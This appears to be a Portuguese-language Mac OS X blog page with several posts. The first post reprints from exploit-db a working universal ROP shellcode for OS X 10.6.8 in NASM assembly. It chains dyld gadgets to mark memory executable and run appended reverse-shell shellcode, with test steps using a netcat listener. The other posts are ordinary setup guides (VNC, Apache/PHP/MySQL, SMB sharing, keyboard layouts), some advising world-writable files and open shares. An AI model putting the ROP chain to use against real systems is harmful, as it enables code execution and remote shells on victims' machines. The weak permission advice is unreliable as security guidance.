OSX universal ROP shellcode Testado no SNOW LEOPARD

Standard


; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you should get a shell over nc
;
; see my blog, if you want to know how this works:
; http://gdtr.wordpress.com
;
; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com).
;
; pa_kt
; twitter.com/pa_kt

extern _printf

global _main

;————————————————–
;- DATA
;————————————————–
section .data

rw_area equ 0x00007FFF5FC50000
rwx_area equ rw_area+0x1000
vm_prot equ 0x00007FFF5FC0D356
fake_stack equ rw_area+0x2000
fake_frame equ fake_stack+0x100
r12_zero equ rw_area-0x1000

rax_off equ rw_area-8
rbx_off equ rw_area+8-8
rcx_off equ rw_area+0x10-8
rdx_off equ rw_area+0x18-8
rsi_off equ rw_area+0x28-8
rbp_off equ rw_area+0x30-8
rsp_off equ rw_area+0x38-8
r8_off equ rw_area+0x40-8
r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC
pop_rbx equ 0x00007FFF5FC23373
store_reg equ 0x00007FFF5FC24CE1
set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7
c_size equ 0x1000
c_addr equ rwx_area
c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area
; size = 0x1000
stub:
lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]
xor rcx, rcx
inc rcx
shl rcx, 12 ;rcx = 0x1000
lea rdi, [rel normal_shellcode]
rep movsb
;int 3
normal_shellcode:

stub_size equ $-stub

; order is important
rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,
dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,
dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,
dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,
dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,
dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,
dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack
dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)
dq pop_rdi, fake_frame-8-0x38, store_reg,
saved_rsp:
dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre
saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot
dq pop_rdi, rw_area, set_regs
; marker
; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin “x64_shellcode”
x64_shellcode_size equ $-x64_shellcode

hello db “test”, 0
fmt db “x%02x”,0

section .bss

rop_stage0 resq 100
copy_stub resq ((stub_size+7)/8)*5
copy_stub_size equ $-copy_stub

;————————————————–
;- CODE
;————————————————–
section .text

prep_stub:

mov rcx, (stub_size+7)/8
mov rsi, stub
mov rdi, copy_stub
mov rbx, rwx_area-8
go:
mov rax, pop_rdi
stosq
mov rax, rbx
stosq
mov rax, pop_rbx
stosq
movsq
mov rax, store_reg
stosq
add rbx, 8
loop go
ret

make_stage0:
mov rsi, rop_pre
mov rdi, rop_stage0
mov rcx, rop_pre_size
rep movsb

mov rsi, copy_stub
mov rcx, copy_stub_size
rep movsb

mov rsi, rop_post
mov rcx, rop_post_size
rep movsb

mov rsi, x64_shellcode
mov rcx, x64_shellcode_size
rep movsb

ret

print_it:
push rbp
mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size
lea rsi, [rel rop_stage0]
xor rax, rax
one_char:
lodsb
push rsi
push rcx
mov rsi, rax
mov rdi, qword fmt
xor rax, rax
call _printf
pop rcx
pop rsi
loop one_char

leave
ret

_main:
push qword rbp
mov rbp, rsp

call prep_stub
call make_stage0

call print_it

;lea rsp, [rel rop_stage0]
;ret

leave
ret

Fonte: http://www.exploit-db.com/exploits/17564/

Como escrever números Ordinais no Mac OS X Leopard | Snow Leopard | Lion

Standard

Olá galera tudo na paz de DEUS?

Hoje, vai um artigo simples e que com certeza muita gente recém chegada ao fantástico mundo da maçã ainda não conhece…. sentados na cama ontem, minha amada @sabrinacpsantos me solta a seguinte pergunta:

-Douglas como faço pra colocar aquele esquema de “bolinha” e “azinho” aqui no Mac (número ordinais)?

-Vixe amor, eu não sei… vou pesquisar…..

Pesquisei um pouco e me deparei com um material do próprio site da apple americana…. e lá estava ensinando….. vai em imagens um esquema abaixo de como escrever números ordinais no Mac/Hackitnosh …. vou mostrar no teclado apple verdadeiro e no teclado “ABNT2 de PC” vejam na imagens para ficar mais fácil….

 

Em um teclado Apple Original

 

Agora em um Hackintosh ou em um Mac Verdadeiro utilizando Teclado de PC (vulgarmente aqui no Brasil teclado ABNT2) faça da seguinte forma

IAhhhhhhhhhhhhhh ….pegadinha do malandro…. é igual moçada…. só que lembre-se que o Alt em teclado não apple ficam do lado Esquerdo  da Barra de espaços, enquanto em teclados apple ficam entre as teclas Command e Control.

Espero que seja uma dica útil aos novos marujos do Navio Os X.

Gostou? Comente, complemente e espalhe!

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Standard

Bom, pessoal, nós do app gostaríamos de detalhar algo.
NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui.

Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir nosso how to de instalação do apache, php, e mysql no mac os x lion ou instalação do apache, php, e mysql no mac os x snow leopard

mysql

mysql

) basta fazer o seguinte:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysql –user=little_oak

Pronto, você precisa lembrar que –user=little_oak deve ser susbsituído por –user=usuário_do_SEUMAC

Depois disso trabalhe normalmente.

Perceba uma coisa forte, o MAC OS X não precisa de root para fazer as coisas (dentro do mysql), ele já sabe que você, usando sudo É O CARA, por isso basta rodar este comando no terminal:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Troque o little_oak por seu usuário. Depois disso é só alegria.

Abraços galera e clique em SHARE, please!

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Standard

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress.
Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um router wireless) e usando Windows (ops, ruindows) seven e o cliente vnc TightVNC (mostraremos o link de download), que além de free atende bem pra caramba.
Bora simbora e deixar de balela?

Primeiro devemos adentrar nas preferências do sistema afim de irmos aos menus principais de configurações do mac, acompanhe o print:

Clicando no menu de preferências do mac

Clicando no menu de preferências do mac

Agora iremos clicar no menu de preferências:

menus principais SHARING

menus principais SHARING

Pronto, devemos ir na área de Sharing (ali liberamos apache, acesso remoto, compartilhamento de arquivos e etc):

Marcando acesso remoto

Marcando acesso remoto

Assim que marcamos a opção REMOTE MANAGEMENT o menu do print acima é exibido.

Iremos comentar cada opção marcada:

1 – Observe (modo de observação), marcamos o control para permitir controle por parte do acesso remoto (neste caso nosso pc Window$ 7), A opção de mostrar quando há alguém observando o pc é bom de estar marcada (é, meu amigo, alguém dentro e você sem saber é osso né?),

2 – Generate Reports é bom estar marcado pois gera logs (vai que alguém faz besteira?),

3 – Open and Quit app… Deixa marcado, afinal de contas isto habilita o suporte para o cliente remoto poder executar aplicativos,

4 – Change Settings, bem, em um caso de setup, por que não deixar ativo? Vale a pena sim! Se você precisar de um ajuste aqui ou ali deve ter isto ON.

5 – Delete e replace items é bom, afinal de contas direito de escrever, ler e executar, para acesso remoto é quase um padrão.

6 – Start text… é bom quando se quer trocar idéia com o cliente remoto, deixamos on.

7 – Restart and Shutdown, meu amigo, se alguém precisa aplicar mudanças críticas e positivas em seu Mac Os X, por que não deixar este recurso para o acesso remoto? Se achar inviável que alguém remotamente desligue seu apple, deixe isto desmarcado.

8 – Suporte a cópia de itens é bom ;), deixe on.

Assim que damos ok é solicitada autorização do user afim de que seja validada a mudança, mas para que isto ocorra de verdade devemos clicar na opção COMPUTER SETTINGS para poder deixar a coisa no ponto (é aqui que aplicamos a senha de acesso remoto, afinal de contas deixar um mac com todos os recursos globais e ainda deixar sem senha é tiro de calibre 12 no próprio pé, né?

Aplicando senha e confirmando

Aplicando senha e confirmando

Deixe em vnc viewers a senha (coloque algo usando caracteres especiais para dificultar a vida dos lamers, use #$%&*@./<> com caracteres de senha).

Assim que aplicar você precisará confirmar usando sua senha de usuário do sistema, confirme com sua senha (vide print a seguir):

Confirmar senha no Mac Os X

Confirmar senha no Mac Os X

Pode ser que nós (appunix e você), algum dia, nesta vida de trabalhador braçal, possamos nos perguntar?

Como descubro meu ip nesse danado desse mac?

Relaxa, lembra do esquema de Central das preferências do mac? Então, a gente confirmar o Sharing e volta lá, no menu networking, ou seja: Preferências do Sistema-> Network.

Veja o ícone no MEIO da central de preferências:

Centralizador de Preferências do Mac Os X

Centralizador de Preferências do Mac Os X

Pronto, depois é só clicar em Redes (Network) e meter bala, veja o danado do IP no MEIO da nova tela:

Olha o ipzão aí gente

Olha o ipzão aí gente

 

Pronto, já temos o ip em mãos, no meu caso a terminação é 104. O que devemos fazer?

No Microsoft Windows 7 devemos baixar o cliente VNC Free, para isso acesse o linkÇ

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Baixe o cliente e em seguida abra-o.

Assim que executar o tightvnc você vai ver a seguinte tela:

cliente VNC

cliente VNC

Assim que confirmar o acesso ele vai mostrar uma tela requisitando senha, igual essa aqui ó:

senha VNC

senha VNC

Confirme com aquela senha que você definiu nas propriedades de acesso remoto de seu macosx e FINISH!

 

Curtiu?

Curtimos também.
Abraços a todos e obrigado pela visita!

Como instalar PHP, Apache e Mysql no Mac Os X Snow Leopard (mamp2 no mac)

Standard

Este é um artigo daqueles “easy-to-use”, aonde instalaremos o apache 2, o php 5 e o mysql 5 para que possamos programar sossegadamente (fazer um webserver para hospedar nossa aplicação localmente).
O sistema operacional usado aqui foi o Mac Os X Snow Leopard 10.6.7, mas o procedimento é o mesmo para 10.6.8.

Vamos para o fight?
Iremos usar o console do Mac os x, assim como o ports do Mac para gerenciar o trem com velocidade.
Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x

como abrir terminais no mac os x

Clicando lá você fará o seguinte:

Little-oaks-appunixlabs:~ sudo apachectl start

Isto fará com que você chame recursos globais como super usuário e ative o serviço do apache 2 dentro do seu Mac os x, LEMBRANDO que será requisitada a senha de superusuário para que você possa rodar este recurso, pois o sudo te dá poder de root para executar um determinado comando, como neste caso tomtamos o exemplo do apachectl.

Para conferir que o procedimento deu certo abra seu navegador web (no nosso caso curtimos muito o Mozilla Firefox, mas fica ao seu critério o navegador [isto não influenciará em nada neste how to]), conforme imagem abaixo, na barra de endereços digite

Apache ok

Apache ok

HTTP://localhost

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

 

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

 

As vezes você pode estar se perguntando:

Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X Snow Leopard está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

como ver informações do seu mac os x

como ver informações do seu mac os x

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)

baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

passo1

passo1

 

Feito isto iremos confirmar se o mysql está rodando com o seguinte comando:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

Teremos liberadas extensões como PDO (Muito boa para abstração no banco de dados mysql), Mysqli (a versão aprimorada do conector nativo do Mysql [somente disponível a partir do Mysql 5.x])
Pronto, feito isto instalamos o Mysql 5 , Php 5 e Apache 2 em nosso Mac Os X :D.
Abraços a todos e saibam que o AppUnix aprecia sua visita!

Como criar pendrive bootável do Mac OS X Lion

Standard

Olá galera tudo tranqüilo?
Com a chegada da nossa versão final do Mac OS X Lion pairou sobre nossas cabeças como seria se precisácemos fazer uma instalação do ZERO em nossos iGadgets… Com o upgrade sendo feito através do App Store fica essa dúvida na cabeça dos usuários… De acordo com a Apple caso o usuário queira uma instalação Limpa, o mesmo terá que instalar o Snow Leopard fazer update até a versão 10.6.6 e ai, só depois dessa trabalheira toda você será capaz de subir para o Lion (o que na verdade já não é mais uma instalação limpa.. venhamos e convenhamos Apple, isso não é instalação limpa)… mas deixemos de mazela e vamos ao que interessa…. hoje vou ensinar como criar um pendrive bootável com a versão Build final (11A494) do Mac OS X Lion….
O que você precisará:

—> 1 computador rodando Mac OS X Snow Leopard (pode ser Hackintosh)
—> o .app do Mac OS X Lion (isso mesmo galera… o Sistema operacional vem como .app)
—> 1 pendrive de no mínimo 8GB (poderia ser 6Gb, mas como nunca ví estou indicando um de 8)
—> 15 minutos pra ler esse artigo

Galera primeira coisa a se fazer é preparar o pendrive… vá até o Utilitário de Disco, no painel superior | Ir/Utilitários

Lion

Entre em Utilitário de Disco
Lion_1

Chegando ao Utilitário verá uma tela mais ou menos assim
Lion_2

No painel da esquerda selecione o disco onde deseja que o Lion faça sua moradia… No caso um Kingston Datatraveler de 8.01 GB
Lion_3

Na aba de ações escolha Particionar
Lion_4

Em esquema de volume e Informações de Volume coloquei respectivamente 1 Partição e nome coloquei Lion (pode se usar qualquer nome, pois o mesmo será substituído posteriormente)
Lion_5

No canto inferior direito clique em Aplicar
Lion_6

Será notificado sobre as notificações no Disco
Lion_7

Mande particionar. Acabamos a primeira etapa….
Agora pra adiantar as coisas baixe o aplicativo ShowAllFiles
Executeo e claque em Show

Lion_8

Agora vá até seu .app que baixou da App Store, claque com o botão direito do mouse e claque em Mostrar Conteúdo do Pacote
Lion_9

Como na imagem entre na pasta Contents depois na pasta SharedSupport chegará até nosso primeiro arquivo importante…. execute o arquivo de imagem InstallESD.dmg
Lion_10

Ao executá-lo verá uma tela semelhante a essa
Lion_11

Agora execute o BaseSystem.dmg
Lion_12

Chegará a essa tela
Lion_13

Agora volte ao Utilitário de Disco, na guia onde usamos para Particionar o disco de destino do Lion, clique em Restaurar
Lion_14

Em Fonte arraste Mac OS X Base System (que foi montado quando executamos o BaseSystem.dmg)
Lion_15

Em destino arraste seu pendrive para label (em nosso caso o chamamos de Lion)
Lion_16

Ficando assim a tela completa
Lion_17

Clique em Restaurar no canto inferior Direito
Lion_18

Será notificado, clique em Apagar
Lion_19

Digite sua senha
Lion_20

Todo o processo demora em torno de 5 minutos…. agora falta pouco galera… muito pouco… Agora amigos vá até o disco Mac OS X Install ESD
Lion_21

Agora copie a pasta Packages para a área de transferência (Command+C)
Lion_22

Agora vá no pendrive (que agora chama-se Mac OS X Base System)… pra facilitar na identificação do local correto, aconselho verificar a ordem dos dispositivos montados (em todos meus teste por ter sido o ultimo a ser montado em todo o processo o pendrive fica como sendo o ultimo da lista)
Lion_23

No seu pendrive vá em System/Installation
Lion_24

Exclua o atalho para  a pasta Packages que ali se encontra
Lion_25

Lembram da pasta Packages que copiamos lá do Mac OS X Install ESD?
é pra cá que vamos copialo, é uma cópia um pouquinho demorada (já que estamos falando de 3.26 GB e para um dispositivo com velocidade de gravação baixa)
Lion_26

Agora é só correr para o abraço… pode usar tanto no seu Mac verdadeiro quanto no seu Hackintosh (com o devido CdBoot… Aconselho CdBoot feito pelo André do HMBT…que funciona desde de o DP4 do Mac OS X Lion)…
Abraço a todos… Espero que ajude a todos… Obrigado aos vários fóruns sobre Mac OS, OSX86 que existem por ai… em especial à toda staff do HMBT (http://www.hmbt.org/forum)
Fui!!!! 😀

Gostou? Comente, complemente e espalhe!

Compatilhar arquivos no Mac OS X com Windows | Linux usando SAMBA

Standard

Oi galera tudo na paz?
Depois de muito muito muito tempo sem escrever algo que valha a pena ler, volto eu depois de algum tempo bem tenso na faculdade. Mas vamos lá… hoje vou mostrar como fazer do seu mac um servidor de arquivos MUITO bom e, se não for tão eficiente quanto o nosso querido SAMBA sobre um Linux bate de frente com o mesmo… so que com a diferença de não precisar saber se quer um mízero comando no terminal….
Duvida?
Veja bem, fiz um teste esses dias com um HACKINTOSH, vejam bem… um HACKINTOSH rodou como servidor de arquivos e Sistema de Automação comercial para uma rede de mais de 50 computadores sem ao menos fazer com que o load dessa máquina chegasse a 2… galera um HACKINTOSH controlou uma empresa inteira com apenas alguns cliques e algumas palavras digitadas… não é brincadeira galera…. poderia estar escrevendo esse how to apenas colocando como compartilhar arquivos do seu Mac | Hackintosh com computadores Window$, Linux…. mas quero deixar claro que se houver necessidade de segurar as pontas como servidor de arquivos… esse cara consegui tranqüilamente cumprir o papel…. mas vamos lá, é bem simples rápido e eficiente, como tudo no mundo da maçã….
Vá até Preferências do Sistema, para tal vá no Menu no canto superior esquerdo

Pref_Sistemas

Chegando nesse maravilhoso Painel, na guia Internet e Redes sem fio, vá em Compartilhamento

Internet_Rede

Chegará nesse painel PERFEITO

Compartilhamento

Podem reparar que por padrão o compartilhamento de arquivos vem Desativado

Compartilhamento_2

Clicando em Opções no canto inferior Direito chegará a seguinte tela…

Compartilhamento_3

Não iremos abordar a fundo hoje todas as funções somente o protocolo SMB ou SAMBA para os mais íntimos e que nos atenderá muito bem como abordado acima…. Marque Compartilhar arquivos e pastas usando SMB (Windows) e não marque nenhum usuário (isso pode ser feito assim que você estiver mais familiarizado com esse ambiente e jápuder fazer teste sozinho)

Compartilhamento_4

Podem ver que na Guia Pastas Compartilhadas Temos somente essa pasta padrão compartilhada

Compartilhamento_5

Clicando com o + você será guiado a adicionar mais Diretórios a serem compartilhados… Em nosso caso vamos compartilhar um Diretório chamado Dados

Compartilhamento_6

Agora damos permissão as qualquer usuário para acessar, ler, gravar em nosso SAMBA… é tipo um 777 para usuário Nobody do SAMBA rodando sobre Linux….

Compartilhamento_7

Agora basta, na lista a esquerda, marca o item Compart. de Arquivos para ativar de vez o compartilhamento

Compartilhamento_8

Pode ver agora que Compartilhamento Windows está como ativado

Compartilhamento_9

Agora vou lhes mostrar como usufruir do nosso compartilhamente no Winodws. No Window$ vá em Iniciar, Executar:

Windows

Chegará a isso:

Windows_2

Seu Windows XP, Windows Vista ou WIndows 7 enxerga esse diretório como sendo uma pasta de Compartilhamento feita por um outro computador Window$…. Se você chegou até aqui tento resultados parecidos com os das imagens do how to, quer dizer que fez tudo corretamente e já tem Servidor de Arquivos funcionando perfeitamente em seu Mac | Hackitnosh.

Agora de um Linux qualquer, em nosso caso um Cent OS, faça da seguinte forma, Vá em Locais, Conectar ao Servidor

Centos

Em Tipo de serviço, por padrão estará como FTP Público

Centos_2

Clique e escolha Compartilhamento do Window$

Centos_3

Nessa próxima tela, como não colocamos senha, usuário nem nada que impedisse acesso de qualquer usuário à pasta Dados, então coloque somente o Endereço IP do seu Mac | Hackintosh, em nosso caso 192.168.0.100

Centos_4

Chegará a tela

Centos_5

Pronto galera, está ai…. tudo funciona com um SAMBA legítimo…
Espero ter ajudado ao iniciantes no mundo da maça e a Sysadmins que as vezes pegam esses rabos de foguete pra mexer… isso ai só é a ponta do IceBerg… dá pra muita coisa com esse esquema de permissões…. Testem, mexam, e principalmete compartilhem com quem necessita ajuda…. se um dia você encontrou o que procurava aqui no app, um dia com certeza alguém precisará de usa ajuda…. não retenha conhecimento…. Obrigado por visitar nosso Blog…
Abraço a todos!!!! 😀

Como fazer printscreen no Mac Os X Leopard | Snow Leopard

Standard

Um tarefa mais simples, porém menos produtiva junto ao Windows é “printar” uma tela.
Sim, é simples, teclando PrintScreen temos uma imagem na memória e basta abrir um programa, como por exemplo Paint Brush e colar (CTRL+V) e temos a imagem lá. Se salvarmos encontraremos um BMP ultra pesado e com qualidade precária.

No Mac Os X, apesar de ser diferente, a idéia de prints no Mac é bem superior ao Windows. Veja pela lógica, bater um print normalmente é algo para uma produção corriqueira (printar uma tela para em seguida enviar uma imagem de erro para alguém como parte de um report), printar para fazer montagens em editores profissionais como Photoshop, por exemplo.

No caso do Mac Os X, a mentalidade dos desenvolvedores é muito inteligente, veja por que:

1 – Maior parte das alternativas de prints salva na área de trabalho,

2 – Os prints salvos automaticamente no Desktop SÃO EM FORMATO PNG. (acredite, a qualidade/consistência desse formato são violentíssimos).

 

Vamos aos comandos?

 

1 – Printando uma tela e armazenando a imagem no desktop em formato PNG:

command+shift+3

2 – Printando uma tela a qual poderemos marcar o campo de print com o cursor do mouse:

command+shift+4

3 – Printando uma tela de forma que seu cursor selecione a janela que possa ser printada:

command+shift+4+posterior toque na barra de espaço

4 – Printando uma tela para armazena-la na memória de forma que possamos colocar a imagem em um programa profissional (Photoshop, por exemplo):

command+shift+3+ctrl, command+shift+4+ctrl, command+shift+4+posterior toque na barra de espaço+ctrl

 

É possível mudar o formato das imagens salvas? SIM!

Para mudar o formato você precisa entrar no console e digitar:

defaults write com.apple.screencapture type pdf

 

Posso voltar para PNG? SIM!

defaults write com.apple.screencapture type png

 

Baseado em: http://www.infoblogs.com.br/view.action?contentId=16627&Como-fazer-print-screens-no-Mac-OS-X.html

Teclado ABNT2 on Mac OS X | Hackintosh Snow Leopad

Standard

Olá galera tudo na paz?

Hoje venho mostrar a vocês que estão tendo dificuldades com teclado ABNT2 em seu Mac/Hackintosh rodando Mac OS X Snow Leopard. Existem por ai MUITOS métodos dizendo fazer funcionar perfeitamente Teclado ABNT2 mas, sua grande maioria são layouts falhos… onde algumas teclas ficam sem funcionar ou adquirem funçoes diferente do que as que realmente têm… Após bastante tempo usando um teclado Apple ( layout Inglês Internacional) tanto em meus Hackintosh quanto no MacBook, não sentia necessidade de postar uma solução para ABNT2 aqui no blog… Só que com a vinda de MR. Little_Oak para nosso mundo Mac OS X, foi necessário pesquisar uma maneira de deixar a coisa bem funcional… pesquisei MUITO e pra falar a verdade quando estava quase desistindo encontrei uma solução, posso dizer que esse rapaz/menino/homem que fez isso é o CARA…. eu inclusive tentei por várias vezes editar alguns layouts existentes, mas sem sucesso… falatavam teclas e outros probleminhas…. mas vamos ao que interessa.

Siga as instruções abaixo e em menos de 15 minutos terá o seu querido teclado em ABNT2 funcionando corretamente

EDIT: Pessoal caso queiram(até indico) podem continuar seguinto esse how-to para que cheguem ao fim com teclado ABNT2 funcionando plenamente… há um artigo mais recente no blog em que publico um .PKG (instalador no Mac OS X) que faz todo o trabalho que ensino a fazer manualmente aqui, ele faz automáticamente… aconselho a leitura para fins de conhecer melhor o sistema Mac OS, mas aconselho tbm a leitura do artigo http://www.appunix.com.br/howto/mac-os/teclado-abnt2-mac-os-x-hackintos-lion/ onde como disse acima publico um .PKG desenvolvido por mim para facilitar a vida dos Mac Users e Hackntoshers de plantão…

1.    Baixe e abra o arquivo compactado.Aqui
2.    Na pasta em que o arquivo foi descompactado, localize o arquivo Brazilian ABNT2.bundle.

ABNT2_budle

3.    Copie este arquivo para a pasta ~/Library/Keyboard Layouts (para que o layout fique disponível apenas para o seu usuário) OU /Library/Keyboard Layouts/ (para que o layout fique disponível para todos os usuários).

ABNT2_bundle2

4.    Será necessário fazer Logout (Finalizar Sessão) e entre novamente no sistema para que o layout seja carregado.

Logout

5.    Vá em Preferências do Sistema (System Preferences)
Preferencias_Sistema

6.     Vá em Idioma & Texto (Language & Text). No guia Input Sources (Fonte de entrada/Layouts de Teclado)
Input_Sources

 

7.    Procure/Selecione Brasileiro ABNT2 (Brazilian ABNT2).
Select_ABNT2

 

8.    Após marcar ficará disponível no painel superior a opção Brasileiro ABNT2 (Brazilian ABNT2)

Painel_superior

9.    Marque o layout desejado (Brazilian ABNT2) .

Painel_ABNT2

 

Pronto, agora você pode usar o teclado normalmente.(diga-se #alegria)

Mapeamento das Teclas
Teclas mapeadas de acordo com o layout mostrado na Wikipedia:

Normal

‘  1  2  3  4  5  6  7  8  9  0  –  =
q  w  e  r  t  y  u  i  o  p  á  [
a  s  d  f  g  h  j  k  l  ç  ã  ]
  z  x  c  v  b  n  m  ,  .  ;  /

Shift

”  !  @  #  $  %  ä  &  *  (  )  _  +
Q  W  E  R  T  Y  U  I  O  P  À  {
A  S  D  F  G  H  J  K  L  Ç    }
|  Z  X  C  V  B  N  M  <  >  :  ?

AltGr

¬  ¹  ²  ³  £  ¢  ¬  {  [  ]  }    §
/  ?  €  ®  ŧ  ←  ↓  →  ø  þ  ´  ª
æ  ß  ð  đ  ŋ  ħ     ĸ  ł  á  ~  º
º  «  »  ©  “  ”     µ  ─  ·  ạ  °

AltGr + Shift

¬  ¡  ½  ¾  ¼  ⅜  ¨  ⅞  ™  ±  °  ¿  ą
/  ?  €  ®  Ŧ  ¥  ↑  ı  Ø  Þ  `  ā
Æ  §  Р ª  Ŋ  Ħ     &  Ł  ő  ^  º
ă    ©  `  ‘     µ  ×  ÷  ȧ  ¿

Pessoal posso garantir a vocês que esse é o melhor Layout para Teclado ABNT2 que existe na WEB, esse muleque merece/merecia o prêmio Nobel.A maioria da soluções usadas antes de chegar a essa eu ficava sem ? (interrogação) e as teclas | e (pipe e contra-barra) ficavam invertidas com ” e (aspas duplas e aspas simples) . Eu particurlarmente gosto muito do layout Inglês Internacional, mas há pessoas que não se adaptam ou não gostam de tal, esse how-to espero que sirva de referência para uma melhor esperiência para novos usuários do sistema operacional Mac OS X Snow Leopard (10.6.X).

Abraço a todos. 😀

Fonte

